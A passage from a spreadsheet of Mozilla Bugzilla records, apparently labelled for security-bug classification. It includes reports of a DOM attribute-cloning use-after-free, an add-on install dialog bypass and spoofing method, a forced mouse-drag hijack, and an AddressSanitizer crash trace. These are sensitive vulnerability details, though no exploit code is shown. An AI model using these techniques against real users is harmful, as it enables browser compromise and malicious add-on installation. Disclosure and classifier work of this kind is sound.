8 	xul.dll 	nsThread::ProcessNextEvent(bool, bool*) 	xpcom/threads/nsThread.cpp:1189
9 	xul.dll 	NS_ProcessNextEvent(nsIThread*, bool) 	xpcom/glue/nsThreadUtils.cpp:361
10 	xul.dll 	mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) 	ipc/glue/MessagePump.cpp:124
11 	xul.dll 	mozilla::ipc::MessagePumpForChildProcess::Run(base::MessagePump::Delegate*) 	ipc/glue/MessagePump.cpp:301
12 	xul.dll 	_SEH_epilog4
crash reports in the content process with this signature are regressing in firefox 52 builds and later.</t>
        </is>
      </c>
      <c r="X2456" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2457">
      <c r="A2457" t="n">
        <v>572986</v>
      </c>
      <c r="B2457" t="inlineStr">
        <is>
          <t>2010-06-18 00:33:50 -0700</t>
        </is>
      </c>
      <c r="C2457" t="inlineStr">
        <is>
          <t>DOM Attribute Cloning Remote Code Execution Vulnerability (ZDI-CAN-832)</t>
        </is>
      </c>
      <c r="D2457" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2457" t="n">
        <v>1</v>
      </c>
      <c r="F2457" t="n">
        <v>1</v>
      </c>
      <c r="G2457" t="n">
        <v>3</v>
      </c>
      <c r="H2457" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2457" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2457" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2457" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2457" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2457" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2457" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2457" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2457" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2457" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2457" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2457" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T2457" t="n">
        <v>1</v>
      </c>
      <c r="U2457" t="n">
        <v>0</v>
      </c>
      <c r="V2457" t="n">
        <v>25</v>
      </c>
      <c r="W2457" t="inlineStr">
        <is>
          <t>Created attachment 452203
PoC
ZDI-CAN-832: Mozilla Firefox DOM Attribute Cloning Remote Code Execution Vulnerability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due to a workaround that was implemented in
order to support recursive cloning of attribute nodes. If an event is
added to the first attribute node, the application can be made to free
the node, and then later access a reference to it. This can lead to code
execution under the  context of the application.
The issue occurs due to a workaround in the application using the first
child when cloning an attribute node and inserting children. Due to the
side-effect of a attribute's children not actually being inserted due to
bug id 56758 [https://bugzilla.mozilla.org/show_bug.cgi?id=56758], an
event can be made to remove each attribute. This will then free a
reference to an attribute node, which can then be replaced with another
type of the same size. The application will later use this freed type.
content\base\src\nsNodeUtils.cpp:517
nsresult
nsNodeUtils::CloneAndAdopt(nsINode *aNode, PRBool aClone, PRBool aDeep,
                           nsNodeInfoManager *aNewNodeInfoManager,
                           JSContext *aCx, JSObject *aOldScope,
                           JSObject *aNewScope,
                           nsCOMArray&lt;nsINode&gt; &amp;aNodesWithProperties,
                           nsINode *aParent, nsIDOMNode **aResult)
...
  // The DOM spec says to always adopt/clone/import the children of
attribute
  // nodes.
  // XXX The following block is here because our implementation of
attribute
  //     nodes is broken when it comes to inserting children. Instead of
cloning
  //     their children we force creation of the only child by calling
  //     GetChildAt(0). We can remove this when
  //     https://bugzilla.mozilla.org/show_bug.cgi?id=56758 is fixed.
  if (aClone &amp;&amp; aNode-&gt;IsNodeOfType(nsINode::eATTRIBUTE)) {
    nsCOMPtr&lt;nsINode&gt; attrChildNode = aNode-&gt;GetChildAt(0);
    // We only need to do this if the child node has properties (because
we
    // might need to call a userdata handler).
    if (attrChildNode &amp;&amp; attrChildNode-&gt;HasProperties()) {
      nsCOMPtr&lt;nsINode&gt; clonedAttrChildNode = clone-&gt;GetChildAt(0);
      if (clonedAttrChildNode) {
        PRBool ok = aNodesWithProperties.AppendObject(attrChildNode) &amp;&amp;
aNodesWithProperties.AppendObject(clonedAttrChildNode);
        NS_ENSURE_TRUE(ok, NS_ERROR_OUT_OF_MEMORY);
      }
    }
  }
Version(s)  tested: Mozilla Firefox 3.6.3
Platform(s) tested: Windows XP SP3
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X2457" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2458">
      <c r="A2458" t="n">
        <v>639906</v>
      </c>
      <c r="B2458" t="inlineStr">
        <is>
          <t>2011-03-08 10:40:05 -0800</t>
        </is>
      </c>
      <c r="C2458" t="inlineStr">
        <is>
          <t>When deleting folder inside attachment section, I get Error 403: No such module</t>
        </is>
      </c>
      <c r="D2458" t="inlineStr">
        <is>
          <t>2014-09-24 06:39:12 -0700</t>
        </is>
      </c>
      <c r="E2458" t="n">
        <v>1</v>
      </c>
      <c r="F2458" t="n">
        <v>1</v>
      </c>
      <c r="G2458" t="n">
        <v>6</v>
      </c>
      <c r="H2458" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2458" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J2458" t="inlineStr">
        <is>
          <t>Add-on Builder</t>
        </is>
      </c>
      <c r="K2458" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2458" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2458" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2458" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2458" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2458" t="inlineStr"/>
      <c r="Q2458" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2458" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2458" t="inlineStr">
        <is>
          <t>Builder 0.9</t>
        </is>
      </c>
      <c r="T2458" t="n">
        <v>1</v>
      </c>
      <c r="U2458" t="n">
        <v>0</v>
      </c>
      <c r="V2458" t="n">
        <v>3</v>
      </c>
      <c r="W2458" t="inlineStr">
        <is>
          <t>1. In an addon, create a folder.
2. Upload one file inside the folder.
3. Inside that folder, create one more folder (call it folder 2)
4. Inside folder 2, create a folder 3.
5. Now try to delete folder 2 along with its contents
Result - You will get "Error 403: Forbidden. No such module for your account."</t>
        </is>
      </c>
      <c r="X2458" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2459">
      <c r="A2459" t="n">
        <v>500763</v>
      </c>
      <c r="B2459" t="inlineStr">
        <is>
          <t>2009-06-26 12:03:29 -0700</t>
        </is>
      </c>
      <c r="C2459" t="inlineStr">
        <is>
          <t>Setup 10 new win2k3 buildslaves</t>
        </is>
      </c>
      <c r="D2459" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2459" t="n">
        <v>1</v>
      </c>
      <c r="F2459" t="n">
        <v>1</v>
      </c>
      <c r="G2459" t="n">
        <v>5</v>
      </c>
      <c r="H2459" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2459" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2459" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2459" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2459" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2459" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2459" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2459" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2459" t="inlineStr"/>
      <c r="Q2459" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2459" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2459" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2459" t="n">
        <v>1</v>
      </c>
      <c r="U2459" t="n">
        <v>0</v>
      </c>
      <c r="V2459" t="n">
        <v>10</v>
      </c>
      <c r="W2459" t="inlineStr">
        <is>
          <t>Once the VMs are cloned, we'll need to do some buildbot setup.</t>
        </is>
      </c>
      <c r="X2459" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2460">
      <c r="A2460" t="n">
        <v>1079528</v>
      </c>
      <c r="B2460" t="inlineStr">
        <is>
          <t>2014-10-07 14:44:01 -0700</t>
        </is>
      </c>
      <c r="C2460" t="inlineStr">
        <is>
          <t>[PulseGuardian] Detection of queues can be simplified</t>
        </is>
      </c>
      <c r="D2460" t="inlineStr">
        <is>
          <t>2014-11-26 22:31:11 -0800</t>
        </is>
      </c>
      <c r="E2460" t="n">
        <v>1</v>
      </c>
      <c r="F2460" t="n">
        <v>1</v>
      </c>
      <c r="G2460" t="n">
        <v>4</v>
      </c>
      <c r="H2460" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2460" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J2460" t="inlineStr">
        <is>
          <t>Pulse</t>
        </is>
      </c>
      <c r="K2460" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2460" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2460" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2460" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2460" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2460" t="inlineStr">
        <is>
          <t>[lang=python]</t>
        </is>
      </c>
      <c r="Q2460" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2460" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2460" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2460" t="n">
        <v>1</v>
      </c>
      <c r="U2460" t="n">
        <v>0</v>
      </c>
      <c r="V2460" t="n">
        <v>3</v>
      </c>
      <c r="W2460" t="inlineStr">
        <is>
          <t>guardian.py has a roundabout way of finding the owner of a given queue: it looks for any active connections (normally only one) and sets the user of that connection as the queue's owner.  If it doesn't find one (client hung up right away or can't stay connected for long), the queue is orphaned, and no one is emailed about it if it gets too big and/or is deleted (at least until bug 832415 is fixed).
However, this was conceived before we settled on a restrictive naming convention.  Now you can easily tell the owner of a queue (or an exchange, see bug 1079523) from its name, e.g., queue/&lt;username&gt;/...  We might as well just use that method in guardian.py.</t>
        </is>
      </c>
      <c r="X2460" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2461">
      <c r="A2461" t="n">
        <v>815908</v>
      </c>
      <c r="B2461" t="inlineStr">
        <is>
          <t>2012-11-27 17:33:57 -0800</t>
        </is>
      </c>
      <c r="C2461" t="inlineStr">
        <is>
          <t>Change the email newsletter sign-up box on hacks.mozilla.org to reflect the new name</t>
        </is>
      </c>
      <c r="D2461" t="inlineStr">
        <is>
          <t>2013-01-16 14:55:10 -0800</t>
        </is>
      </c>
      <c r="E2461" t="n">
        <v>1</v>
      </c>
      <c r="F2461" t="n">
        <v>1</v>
      </c>
      <c r="G2461" t="n">
        <v>5</v>
      </c>
      <c r="H2461" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2461" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J2461" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2461" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2461" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2461" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2461" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2461" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2461" t="inlineStr">
        <is>
          <t>r=111654,111667 [u=user c=email p=]</t>
        </is>
      </c>
      <c r="Q2461" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2461" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2461" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2461" t="n">
        <v>1</v>
      </c>
      <c r="U2461" t="n">
        <v>0</v>
      </c>
      <c r="V2461" t="n">
        <v>36</v>
      </c>
      <c r="W2461" t="inlineStr">
        <is>
          <t>Update the email sign-up widget and replace current 'about: hacks graphic 
http://hacks.mozilla.org/wp-content/uploads/2010/01/abouthacks_bw_220x60.png
with name &amp; image of new newsletter: Firefox Apps &amp; Hacks</t>
        </is>
      </c>
      <c r="X2461" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2462">
      <c r="A2462" t="n">
        <v>1042699</v>
      </c>
      <c r="B2462" t="inlineStr">
        <is>
          <t>2014-07-23 07:26:35 -0700</t>
        </is>
      </c>
      <c r="C2462" t="inlineStr">
        <is>
          <t>Firefox Addon bypass dialog and spoof vulnerability</t>
        </is>
      </c>
      <c r="D2462" t="inlineStr">
        <is>
          <t>2024-05-30 08:36:01 -0700</t>
        </is>
      </c>
      <c r="E2462" t="n">
        <v>1</v>
      </c>
      <c r="F2462" t="n">
        <v>1</v>
      </c>
      <c r="G2462" t="n">
        <v>3</v>
      </c>
      <c r="H2462" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2462" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2462" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K2462" t="inlineStr">
        <is>
          <t>31 Branch</t>
        </is>
      </c>
      <c r="L2462" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2462" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2462" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2462" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2462" t="inlineStr">
        <is>
          <t>[reporter-external] leave hidden until bug 1105556 is fixed</t>
        </is>
      </c>
      <c r="Q2462" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2462" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2462" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T2462" t="n">
        <v>1</v>
      </c>
      <c r="U2462" t="n">
        <v>0</v>
      </c>
      <c r="V2462" t="n">
        <v>72</v>
      </c>
      <c r="W2462" t="inlineStr">
        <is>
          <t>Created attachment 8460893
poc.zip
Normally Firefox warns the user when trying to install add-on if this was page-initiated. 
When the page is redirecting or navigating by &lt;a href link, JavaScript or server redirect, Firefox trows the 
'Firefox prevented this site (site.com) from asking you to install software on your computer.' warning at the user, which needs to explicitly be accepted for the add-on to continue installing.
There is however, a simple vulnerability that lets an attacker bypass this dialog, which allows a rather nasty attack on the user.
Basically, there is one exception in which the dialog will not be shown, which is if the user pastes or copies the direct link/URL in the URL bar.
Now the user could just click on links, redirects etc that lead to this page, because a data uri redirected to the page which itself redirects with a 'page moved header' to the location of the add-on, will disrupt that 'chain' and installation of the add-on will start without the dialog. As if the user typed it in directly.
This behavior in combination with a properly timed attack will result in a scenario where the user will download the add-on controlled by the attacker, the legit add-on webpage shown with it. The only thing not correct is the url of the pushed add-on, which the user CANNOT verify. This dialog is really only useful if the download location is from another domain. Since it will only show the https://addons.mozzila.org/firefox/download/latest/123/randomurl .. [truncated].
So the attacker will simply upload his unreviewed add-on, with the same name and icon as the desired add-on to be spoofed. Sure, this will eventually be reviewed and picked up or reported in the process. But in the meanwhile the direct link will be used. And since the reputation of the spoofed add-on that is being pushed doesn't matter (user never views that page). There is no way for the user to notice that the add-on is spoofed.
Attached are the files that would be running on the server.
Demonstration of the issue: https://www.youtube.com/watch?v=VTKblGpeW4Y (unlisted)</t>
        </is>
      </c>
      <c r="X2462" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2463">
      <c r="A2463" t="n">
        <v>500571</v>
      </c>
      <c r="B2463" t="inlineStr">
        <is>
          <t>2009-06-25 18:09:44 -0700</t>
        </is>
      </c>
      <c r="C2463" t="inlineStr">
        <is>
          <t>Need Location, Occupation, and Picture fields for Users</t>
        </is>
      </c>
      <c r="D2463" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E2463" t="n">
        <v>1</v>
      </c>
      <c r="F2463" t="n">
        <v>1</v>
      </c>
      <c r="G2463" t="n">
        <v>6</v>
      </c>
      <c r="H2463" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2463" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J2463" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K2463" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2463" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2463" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2463" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2463" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2463" t="inlineStr"/>
      <c r="Q2463" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2463" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2463" t="inlineStr">
        <is>
          <t>5.0.7</t>
        </is>
      </c>
      <c r="T2463" t="n">
        <v>1</v>
      </c>
      <c r="U2463" t="n">
        <v>0</v>
      </c>
      <c r="V2463" t="n">
        <v>11</v>
      </c>
      <c r="W2463" t="inlineStr">
        <is>
          <t>Picture sizes:
200x200: Meet the Developer (http://mozilla-dev.clearleft.com/pattern-portfolio_inverse.php)
128x128: User Profile (http://mozilla-dev.clearleft.com/profile.php)
64x64: Add-on Detail page</t>
        </is>
      </c>
      <c r="X2463" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2464">
      <c r="A2464" t="n">
        <v>28398</v>
      </c>
      <c r="B2464" t="inlineStr">
        <is>
          <t>2000-02-18 10:29:35 -0800</t>
        </is>
      </c>
      <c r="C2464" t="inlineStr">
        <is>
          <t>Gotta be more careful when emailing state changes of dependent bugs.</t>
        </is>
      </c>
      <c r="D2464" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:21 -0800</t>
        </is>
      </c>
      <c r="E2464" t="n">
        <v>1</v>
      </c>
      <c r="F2464" t="n">
        <v>1</v>
      </c>
      <c r="G2464" t="n">
        <v>4</v>
      </c>
      <c r="H2464" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2464" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2464" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K2464" t="inlineStr">
        <is>
          <t>2.13</t>
        </is>
      </c>
      <c r="L2464" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2464" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2464" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2464" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2464" t="inlineStr"/>
      <c r="Q2464" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2464" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2464" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T2464" t="n">
        <v>1</v>
      </c>
      <c r="U2464" t="n">
        <v>0</v>
      </c>
      <c r="V2464" t="n">
        <v>33</v>
      </c>
      <c r="W2464" t="inlineStr">
        <is>
          <t>The below entertaining mail was generated.  I think what is happening (haven't
looked at the code yet) is when bug B is changed to be dependent on bug A, then
you get notified of all changes to bug A's state that happened ever since you
last generated email diffs for bug *B*.  This is not particularly useful.
Date: Thu, 17 Feb 2000 17:47:16 -0800 (PST)
From: bugzilla-daemon@mozilla.org
To: pavlov@netscape.com
Subject: [Bug 24890] Changed - Cannot dismiss sub-dialogs brought up from prefs
panel
	(text/plain)
http://bugzilla.mozilla.org/show_bug.cgi?id=24890
sairuh@netscape.com changed:
           What    |Old Value                   |New Value
----------------------------------------------------------------------------
  BugsThisDependsOn|                            |28083,28177
This bug depends on bug 28177, which changed state:
           What    |Old Value                   |New Value
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|                            |WORKSFORME
             Status|RESOLVED                    |REOPENED
         Resolution|WORKSFORME                  |
             Status|REOPENED                    |NEW
             Status|NEW                         |ASSIGNED
             Status|ASSIGNED                    |RESOLVED
         Resolution|                            |FIXED
------- Additional Comments From sairuh@netscape.com  2000-02-17 17:47 -------
verif blocked by bugs 28177 and 28083.</t>
        </is>
      </c>
      <c r="X2464" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2465">
      <c r="A2465" t="n">
        <v>329385</v>
      </c>
      <c r="B2465" t="inlineStr">
        <is>
          <t>2006-03-04 18:33:53 -0800</t>
        </is>
      </c>
      <c r="C2465" t="inlineStr">
        <is>
          <t>Attacker can force mouse drag</t>
        </is>
      </c>
      <c r="D2465" t="inlineStr">
        <is>
          <t>2008-10-22 22:42:04 -0700</t>
        </is>
      </c>
      <c r="E2465" t="n">
        <v>1</v>
      </c>
      <c r="F2465" t="n">
        <v>1</v>
      </c>
      <c r="G2465" t="n">
        <v>3</v>
      </c>
      <c r="H2465" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2465" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2465" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K2465" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L2465" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2465" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2465" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2465" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2465" t="inlineStr">
        <is>
          <t>[sg:low?]</t>
        </is>
      </c>
      <c r="Q2465" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2465" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2465" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2465" t="n">
        <v>1</v>
      </c>
      <c r="U2465" t="n">
        <v>0</v>
      </c>
      <c r="V2465" t="n">
        <v>62</v>
      </c>
      <c r="W2465" t="inlineStr">
        <is>
          <t>(This is the same as Liu Die Yu's hijackclick vulnerability for Internet Explorer)
Instead of the normal process of holding the mouse button down and dragging an item to initiate the dragging event, one can simply move the window when the mouse is down instead. This can create a wide range of potential vulnerabilities, such as forcing the user to download a file.
Note: I'm pretty sure I tried this a while ago in the 1.0 branch, and I don't think it worked. Would someone try this for me to see if I'm wrong?</t>
        </is>
      </c>
      <c r="X2465" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2466">
      <c r="A2466" t="n">
        <v>837796</v>
      </c>
      <c r="B2466" t="inlineStr">
        <is>
          <t>2013-02-04 11:12:49 -0800</t>
        </is>
      </c>
      <c r="C2466" t="inlineStr">
        <is>
          <t>images missing on mobile</t>
        </is>
      </c>
      <c r="D2466" t="inlineStr">
        <is>
          <t>2013-02-04 13:14:27 -0800</t>
        </is>
      </c>
      <c r="E2466" t="n">
        <v>1</v>
      </c>
      <c r="F2466" t="n">
        <v>1</v>
      </c>
      <c r="G2466" t="n">
        <v>5</v>
      </c>
      <c r="H2466" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2466" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2466" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K2466" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2466" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2466" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2466" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2466" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2466" t="inlineStr">
        <is>
          <t>u=user c=wiki p=0 2013.2</t>
        </is>
      </c>
      <c r="Q2466" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2466" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2466" t="inlineStr">
        <is>
          <t>2013Q1</t>
        </is>
      </c>
      <c r="T2466" t="n">
        <v>1</v>
      </c>
      <c r="U2466" t="n">
        <v>0</v>
      </c>
      <c r="V2466" t="n">
        <v>4</v>
      </c>
      <c r="W2466" t="inlineStr">
        <is>
          <t>Hi,
All images in KB articles are missing.
1. go to support.mozilla.org on a mobile device (using Firefox for Android, gaia browser, or stock Android)
2. observe that no images appear in any articles.
expected: to see all images</t>
        </is>
      </c>
      <c r="X2466" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2467">
      <c r="A2467" t="n">
        <v>798853</v>
      </c>
      <c r="B2467" t="inlineStr">
        <is>
          <t>2012-10-06 21:47:59 -0700</t>
        </is>
      </c>
      <c r="C2467" t="inlineStr">
        <is>
          <t>Heap-use-after-free in gfxFont::GetFontEntry</t>
        </is>
      </c>
      <c r="D2467" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:48 -0700</t>
        </is>
      </c>
      <c r="E2467" t="n">
        <v>1</v>
      </c>
      <c r="F2467" t="n">
        <v>1</v>
      </c>
      <c r="G2467" t="n">
        <v>3</v>
      </c>
      <c r="H2467" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2467" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2467" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K2467" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2467" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2467" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2467" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2467" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2467" t="inlineStr">
        <is>
          <t>[asan][adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q2467" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2467" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2467" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T2467" t="n">
        <v>1</v>
      </c>
      <c r="U2467" t="n">
        <v>0</v>
      </c>
      <c r="V2467" t="n">
        <v>43</v>
      </c>
      <c r="W2467" t="inlineStr">
        <is>
          <t>Created attachment 668876
Testcase
Reproduces on trunk. Let the simple testcase run for like 2-5 min to see it crash automatically and reliably.
=================================================================
==6069== ERROR: AddressSanitizer heap-use-after-free on address 0x7fdcc8f3a498 at pc 0x7fdcf32ee33e bp 0x7fff3ac5bef0 sp 0x7fff3ac5bee8
READ of size 8 at 0x7fdcc8f3a498 thread T0
    #0 0x7fdcf32ee33d in nsRefPtr&lt;gfxFontEntry&gt;::get() const ../../dist/include/nsAutoPtr.h:1003
    #1 0x7fdcf3f01350 in gfxFont::GetFontEntry() ../../dist/include/gfxFont.h:1497
    #2 0x7fdcfe894c4c in gfxFontCache::HashEntry::KeyEquals(gfxFontCache::Key const*) const gfx/thebes/gfxFont.cpp:1255
    #3 0x7fdcfe948699 in nsTHashtable&lt;gfxFontCache::HashEntry&gt;::s_MatchEntry(PLDHashTable*, PLDHashEntryHdr const*, void const*) ../../dist/include/nsTHashtable.h:440
    #4 0x7fdcfdf2e9da in SearchTable(PLDHashTable*, void const*, unsigned int, PLDHashOperator) objdir-ff-asan-sym/xpcom/build/pldhash.cpp:434
    #5 0x7fdcfdf2b7c5 in PL_DHashTableOperate objdir-ff-asan-sym/xpcom/build/pldhash.cpp:587
